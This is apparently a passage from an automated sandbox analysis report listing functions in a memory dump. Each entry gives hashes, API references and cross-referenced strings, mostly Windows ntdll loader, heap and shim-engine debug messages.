                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-2196497285
                                                • Opcode ID: 093403af15f7fc8596b51a12cf486efe89661016b35c234bc99787c338f45d70
                                                • Instruction ID: 72c9633a602b9a6dc0649898f7eaaeddce3b2c5c304ec4213127f895ca75b329
                                                • Opcode Fuzzy Hash: 093403af15f7fc8596b51a12cf486efe89661016b35c234bc99787c338f45d70
                                                • Instruction Fuzzy Hash: FEE1DF74A08346CFE710CF25C890B5AB7F4BF88358F544A2DE8968B285D771E948CB93
                                                Function 36D5645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 36D5656C
                                                  • Part of subcall function 36D565B5: RtlDebugPrintTimes.NTDLL ref: 36D56664
                                                  • Part of subcall function 36D565B5: RtlDebugPrintTimes.NTDLL ref: 36D566AF
                                                Strings
                                                • LdrpInitShimEngine, xrefs: 36DB99F4, 36DB9A07, 36DB9A30
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36DB99ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36DB9A2A
                                                • apphelp.dll, xrefs: 36D56496
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36DB9A01
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DB9A11, 36DB9A3A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-204845295
                                                • Opcode ID: 831122c7ebc7e726be3c4b8408dcd441d4949c33f5d281f4ac9eae4a447de710
                                                • Instruction ID: 9c5b5c3a7a52179dc9097b2078dcf0873a8e04f7fc6700621be2a7f5ad2768f1
                                                • Opcode Fuzzy Hash: 831122c7ebc7e726be3c4b8408dcd441d4949c33f5d281f4ac9eae4a447de710
                                                • Instruction Fuzzy Hash: 9E51A071A08384AFEB15DF20C841E5B7BE5AF85644F410919F686AB1A4DB30D908CFA3
                                                Function 36DDFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                • API String ID: 3446177414-4227709934
                                                • Opcode ID: 3ca5c748822ef97e8b4f7e878059fef1a3174926bef2292f27da924a6809aab8
                                                • Instruction ID: d5da898533b377e65cb42c6f0fe297173d390820c09e0d0f6ffa558545420372
                                                • Opcode Fuzzy Hash: 3ca5c748822ef97e8b4f7e878059fef1a3174926bef2292f27da924a6809aab8
                                                • Instruction Fuzzy Hash: 6B417CB9E01249ABDB01EF9AC990ADEBBB5FF88344F100119EA04AB341D731DD15CBA0
                                                Function 36E0FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                • API String ID: 3446177414-3492000579
                                                • Opcode ID: 1d92ff93613537d877f181fee2a90100432f4b3c7a2a215cb23fc9547cd34da3
                                                • Instruction ID: 2f6835eb406ac9285d19bc58e48f524fa77f9f277d300a5aed9cf260ca8ba171
                                                • Opcode Fuzzy Hash: 1d92ff93613537d877f181fee2a90100432f4b3c7a2a215cb23fc9547cd34da3
                                                • Instruction Fuzzy Hash: B6714575911644DFDB01CFAAC8406ADFBF2FF4A318F548059EA44AB642CB34D989CFA1
                                                Function 36D565B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DB9AF6
                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36DB9AB4
                                                • LdrpLoadShimEngine, xrefs: 36DB9ABB, 36DB9AFC
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DB9AC5, 36DB9B06
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-3589223738
                                                • Opcode ID: 6f16d566ab261bee53d5e08000c06390e5b01fb38fc8bbebfa6ebead12cbeb38
                                                • Instruction ID: b5bd217348274025758238eadd3ebe850db208a38eaf719902fa2628aca37f2f
                                                • Opcode Fuzzy Hash: 6f16d566ab261bee53d5e08000c06390e5b01fb38fc8bbebfa6ebead12cbeb38
                                                • Instruction Fuzzy Hash: C5513176A113989FDF08DB68CC98E9D7BB2AB40304F010155E751BF2A5DB70EC59CBA1
                                                Function 36D89803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: @36$LdrpUnloadNode$Unmapping DLL "%wZ"$df6@36@36$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-1025258580
                                                • Opcode ID: 5effc9fc8288e300b14ae4135a6e1fdd775eec08450ca7de69b7d82a7c9098f5
                                                • Instruction ID: fe7bf1a2e932d21a3542ef21211c4aaedb680aff337bc7f0ebb88b0db3d37aae
                                                • Opcode Fuzzy Hash: 5effc9fc8288e300b14ae4135a6e1fdd775eec08450ca7de69b7d82a7c9098f5
                                                • Instruction Fuzzy Hash: 3251E471A007029FE714EF39CC88B29BBA1BF84214F14066DE5D69F694DB74E845CB92
                                                Function 36D8DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-3224558752
                                                • Opcode ID: f7247bfd412933f672558346c3e9b1b60f63e2d66646b3ddf2407ce9a2411fac
                                                • Instruction ID: ebc341117268c201ed69e510f1a8cffa542aae58d7053ce19d9887d928792c64
                                                • Opcode Fuzzy Hash: f7247bfd412933f672558346c3e9b1b60f63e2d66646b3ddf2407ce9a2411fac
                                                • Instruction Fuzzy Hash: 364116B6A11B44EFE701CF25C898B9AB7B4EF01364F208169E5455B694CB38E884CBD1
                                                Function 36D8DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-1222099010
                                                • Opcode ID: ebe7653a1cd8c2156a4ea31c62bbdc4ec25107e37d8b70b5c4182e19e57163c9
                                                • Instruction ID: 014798218f09964e6ea1864fda1a4328e996e2057884af4ac935d82b339f9ca2
                                                • Opcode Fuzzy Hash: ebe7653a1cd8c2156a4ea31c62bbdc4ec25107e37d8b70b5c4182e19e57163c9
                                                • Instruction Fuzzy Hash: 8E317B36915788EFE712CB24C90CB897BF4EF02754F104094E4414BAD6CBB8E888CF62
                                                Function 36E36940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: 7b2dcaaa0d0f9795830784c17461adb3274418af0b32dbf0ec51eb5af3795000
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: C50235B5509341AFD744CF29C890A6BBBE5EFC8704F60892DF9984B264DB31E909CB52
                                                Function 36DAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 5651a76e66970eaa80e2ac470e3ac713c30c823d01aa72b0eb09bea74c8ed70a
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: F581F678E2D3598EEF04CF69C8517EEBBB1AF45354F544219D850AB3D1C7748842CBA1
                                                Function 36D69126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: ffd55a372519feb2b4d3b72622984cb5183e4670c5ce03d26fc0b07a376dd276
                                                • Instruction ID: c75556627f23c424d4a3bbad9435189cffb1844e6aa351cc9159292b0563d65e
                                                • Opcode Fuzzy Hash: ffd55a372519feb2b4d3b72622984cb5183e4670c5ce03d26fc0b07a376dd276
                                                • Instruction Fuzzy Hash: C0816E75D002699BDB21CF55CC44BEEB7B8AF08754F5041EAE909B7290E7309E84CFA5
                                                Function 36D94D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 36DD3640, 36DD366C
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 36DD365C
                                                • LdrpFindDllActivationContext, xrefs: 36DD3636, 36DD3662
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36DD362F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-3779518884
                                                • Opcode ID: 17a99cba0e720d281b3e41076a4ecc1bdd4bd7f73c13746aa94dc732e6f6bd9f
                                                • Instruction ID: b82a430dca5f689c4331cb66c4a3e73600db2c01525d738d31a29c5111d998c9
                                                • Opcode Fuzzy Hash: 17a99cba0e720d281b3e41076a4ecc1bdd4bd7f73c13746aa94dc732e6f6bd9f
                                                • Instruction Fuzzy Hash: 4D3159BED01312EAFB11AB45C848BD677F4AB81394F438166E60463753EBA0DC84CAF5
                                                Function 36D8245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36DCA992
                                                • apphelp.dll, xrefs: 36D82462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DCA9A2
                                                • LdrpDynamicShimModule, xrefs: 36DCA998
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 991d8b3b2e972b85c94ca5f3a37f0345c4c6165684db4c961857cb8231589eec
                                                • Instruction ID: 78d34d375e714f7d53659de5d9369fbabb6a2f532ea5a7a005ed7f794db3fe12
                                                • Opcode Fuzzy Hash: 991d8b3b2e972b85c94ca5f3a37f0345c4c6165684db4c961857cb8231589eec
                                                • Instruction Fuzzy Hash: CA316B76A00305EBE7199F69CC45E5ABBB6FBC4744F660059EB00B7250DBB0D88ACB91
                                                Function 36E120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 895cc4ae208917c2ee65033c47e8e32c1195a869b683ee09b9171da33b0892d8
                                                • Instruction ID: 729143e1938d2b25b450ad3a463126948a9786f027135d4802a3848f83ea9b1a
                                                • Opcode Fuzzy Hash: 895cc4ae208917c2ee65033c47e8e32c1195a869b683ee09b9171da33b0892d8
                                                • Instruction Fuzzy Hash: 7E2162B6E00219AFDB00DF79DC40AEEBBF9EF54684F450116E905E3200E731DA49DBA5
                                                Function 36D5F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3610490719
                                                • Opcode ID: 77d31c5e738ef3f06a222bbf93d0c60ea690ff597574b77924752b29fc8cd127
                                                • Instruction ID: abedea26055e1e913540baa6d51bb7342c55e52e757b90715e03842c7dd447d0
                                                • Opcode Fuzzy Hash: 77d31c5e738ef3f06a222bbf93d0c60ea690ff597574b77924752b29fc8cd127
                                                • Instruction Fuzzy Hash: 03910475A14B50DFEB15DF25C880F1AB7A5AF84684F020459EA419FA81DB34E845CFE3
                                                Function 36D80BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • LdrpCheckModule, xrefs: 36DCA117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DCA121
                                                • Failed to allocated memory for shimmed module list, xrefs: 36DCA10F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-161242083
                                                • Opcode ID: 98d448cc76b840b0a6fafd8aa88faf8d8d40d10e2a021ba5dd19ea593f65ec40
                                                • Instruction ID: b5fd1d7152007983f89cfbda06f870c287ad6e4f3bc4a6719175261e60e72e0b
                                                • Opcode Fuzzy Hash: 98d448cc76b840b0a6fafd8aa88faf8d8d40d10e2a021ba5dd19ea593f65ec40
                                                • Instruction Fuzzy Hash: 1B71EF75E00309DFEB08CF68C984AAEB7F5EB44304F144469DA01E7251E774ED86CBA1
                                                Function 36E38927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $File
                                                • API String ID: 3446177414-2412145507
                                                • Opcode ID: 19ba4f39f644700f0a5cd623e04644e7b5aad143261551f1cd0c68e7dbf81427
                                                • Instruction ID: 287119fd4f9f681f8f056b9eebff701d0649123cb660c7412729c3287e52d13c
                                                • Opcode Fuzzy Hash: 19ba4f39f644700f0a5cd623e04644e7b5aad143261551f1cd0c68e7dbf81427
                                                • Instruction Fuzzy Hash: 2C619071A1532CABDB26CF25CC41BEA77B9AB48700F5442E9E509E6181DB709F88CF64
                                                Function 36D9C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 36DD82D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 36DD82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DD82E8
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1783798831
                                                • Opcode ID: c0fb5889d8ef1bc22ba6362ddfc323734a0835d5ebbe71dfb904d469522f17d8
                                                • Instruction ID: 20adb8054b8d1caaad0aa24604a3cd6d986f1486cc7094d5e5f7b9f39d4f8d3e
                                                • Opcode Fuzzy Hash: c0fb5889d8ef1bc22ba6362ddfc323734a0835d5ebbe71dfb904d469522f17d8
                                                • Instruction Fuzzy Hash: E34102B5911340EBD711DB64DC44B8B7BE9EF46650F10492AFA48E72A0EB74D809CBA2
                                                Function 36D9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 36DD7BAC
                                                • RTL: Resource at %p, xrefs: 36DD7B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36DD7B7F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: dd8ca4ea8f97d53f49a3cda4ebf3862f1fbcaeab6f01ae33de5caf39120c1d1e
                                                • Instruction ID: 53b70771bbc8611b2fefddec87ef1d6fc17f2969304249c0984621cc6b9aed19
                                                • Opcode Fuzzy Hash: dd8ca4ea8f97d53f49a3cda4ebf3862f1fbcaeab6f01ae33de5caf39120c1d1e
                                                • Instruction Fuzzy Hash: 4A419B39B057029FE720DF25CC40B9BB7E5EF88754F110A5DE99A9B680DB22E8058B91
                                                Function 36D9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 36DD728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36DD7294
                                                • RTL: Re-Waiting, xrefs: 36DD72C1
                                                • RTL: Resource at %p, xrefs: 36DD72A3
                                                Memory Dump Source
